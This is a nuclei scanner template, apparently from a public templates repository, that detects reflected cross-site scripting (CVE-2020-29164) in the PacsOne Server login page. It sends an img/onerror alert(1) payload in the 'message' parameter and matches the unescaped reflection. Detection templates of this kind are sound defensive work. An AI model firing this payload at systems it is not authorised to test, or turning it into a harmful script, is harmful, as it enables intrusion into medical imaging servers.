nuclei-templates/cves/2020/CVE-2020-29164.yaml

32 lines
737 B
YAML
Raw Normal View History

2021-03-17 15:35:41 +00:00
id: CVE-2020-29164
info:
name: PacsOne Server XSS
2021-03-17 15:38:49 +00:00
description: PacsOne Server (PACS Server In One Box) below 7.1.1 is affected by cross-site scripting (XSS).
2021-03-17 15:35:41 +00:00
author: geeknik
severity: medium
tags: pacsone,xss,cve,cve2020
2021-03-17 18:35:04 +00:00
reference: https://gist.github.com/leommxj/0a32afeeaac960682c5b7c9ca8ed070d
2021-03-17 15:35:41 +00:00
requests:
- method: GET
path:
2021-05-10 21:12:34 +00:00
- "{{BaseURL}}/pacs/login.php?message=%3Cimg%20src=%22%22%20onerror=%22alert(1);%22%3E1%3C/img%3E"
2021-03-17 15:35:41 +00:00
matchers-condition: and
matchers:
2021-03-17 15:39:38 +00:00
2021-03-17 15:35:41 +00:00
- type: word
words:
2021-03-17 18:35:04 +00:00
- "text/html"
part: header
- type: word
words:
- '<img src="" onerror="alert(1);">1</img>'
2021-03-17 15:35:41 +00:00
part: body
2021-05-10 21:18:45 +00:00
- type: status
status:
- 200